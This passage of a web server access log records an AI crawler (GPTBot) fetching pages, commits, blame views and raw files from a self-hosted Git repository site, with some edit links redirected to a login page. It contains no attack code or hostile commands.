"/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11351] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11352] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX" [Client 74.7.227.38] [Length 54704] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_exception.hpp" [Client 74.7.227.38] [Length 24029] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2flink.txt" [Client 74.7.227.38] [Length 24708] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:17:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fcmake.check_cache" [Client 74.7.227.38] [Length 24707] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11570] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10265] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10263] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 10061] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:17:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 14800] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:17:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:17:00:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:17:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:17:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:17:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" -[17/Feb/2026:17:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2fcontroller-next-todo.md" [Client 74.7.227.38] [Length 25061] [Gzip 4.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" -[17/Feb/2026:17:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7636] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" -[17/Feb/2026:17:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:17:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11739] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:00:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:17:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:17:00:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:17:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:17:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/types.ts" -[17/Feb/2026:17:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13659] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/claude.md" -[17/Feb/2026:17:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11728] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" -[17/Feb/2026:17:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:17:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11426] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11424] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11423] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 